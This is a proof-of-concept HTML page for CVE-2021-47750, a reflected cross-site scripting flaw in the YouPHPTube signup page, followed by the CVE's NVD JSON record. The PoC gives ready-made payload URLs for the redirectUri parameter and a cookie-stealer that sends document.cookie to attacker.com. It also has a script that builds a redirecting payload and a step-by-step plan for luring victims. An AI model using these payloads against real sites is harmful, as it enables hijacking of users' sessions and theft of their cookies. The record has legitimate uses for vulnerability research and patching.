CVE-2021-47750

<!-- CVE-2021-47750 PoC - YouPHPTube XSS via redirectUri parameter --> <!-- This PoC demonstrates the XSS vulnerability in YouPHPTube signup page --> <!DOCTYPE html> <html> <head> <title>CVE-2021-47750 PoC</title> </head> <body> <h1>CVE-2021-47750: YouPHPTube XSS Vulnerability PoC</h1> <p>Target: YouPHPTube <= 7.8</p> <h2>Malicious Signup URL:</h2> <textarea rows="3" cols="80" readonly> http://target-site.com/signup.php?redirectUri=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E%3Cspan%20x=%22 </textarea> <h2>Alternative Payload - Cookie Stealer:</h2> <textarea rows="2" cols="80" readonly> signup.php?redirectUri=%3Cimg%20src=x%20onerror=%22fetch%28%27https://attacker.com/steal?c=%27+document.cookie%29%22%3E </textarea> <h2>Attack Scenario:</h2> <ol> <li>Attacker crafts a malicious URL with XSS payload in redirectUri parameter</li> <li>Attacker sends the URL to victim via email, social media, or other channels</li> <li>Victim clicks the link and visits the signup page</li> <li>XSS payload executes in victim's browser, stealing cookies or performing actions</li> </ol> <script> // Simulate the vulnerable URL construction const baseUrl = window.location.origin + '/signup.php'; const maliciousPayload = '\"><script>alert("XSS");document.location="https://attacker.com/redirect?c=' + encodeURIComponent(document.cookie) + '"<\/script>\<'; const maliciousUrl = baseUrl + '?redirectUri=' + encodeURIComponent(maliciousPayload); console.log('Malicious URL:', maliciousUrl); document.getElementById('generated-url').textContent = maliciousUrl; </script> </body> </html>

{"cve": {"id": "CVE-2021-47750", "sourceIdentifier": "[email protected]", "published": "2026-01-13T23:15:49.097", "lastModified": "2026-01-22T20:27:30.770", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "YouPHPTube <= 7.8 contains a cross-site scripting vulnerability that allows attackers to inject malicious scripts through the redirectUri parameter in the signup page. Attackers can craft special signup URLs with embedded script tags to execute arbitrary JavaScript in victims' browsers when they access the signup page."}, {"lang": "es", "value": "YouPHPTube &lt;= 7.8 contiene una vulnerabilidad de cross-site scripting que permite a los atacantes inyectar scripts maliciosos a través del parámetro redirectUri en la página de registro. Los atacantes pueden crear URLs de registro especiales con etiquetas de script incrustadas para ejecutar JavaScript arbitrario en los navegadores de las víctimas cuando acceden a la página de registro."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:youphptube:youphptube:*:*:*:*:*:*:*:*", "versionEndIncluding": "7.8", "matchCriteriaId": "7384B6B7-3F47-4F2D-91FA-F6C62381B359"}]}]}], "references": [{"url": "https://web.archive.org/web/20170506141644/https://www.youphptube.com/", "source": "[email protected]", "tags": ["Not Applicable"]}, {"url": "https://www.exploit-db.com/exploits/51101", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory", "VDB Entry"]}, {"url": "https://www.vulncheck.com/advisories/youphptube-cross-site-scripting", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}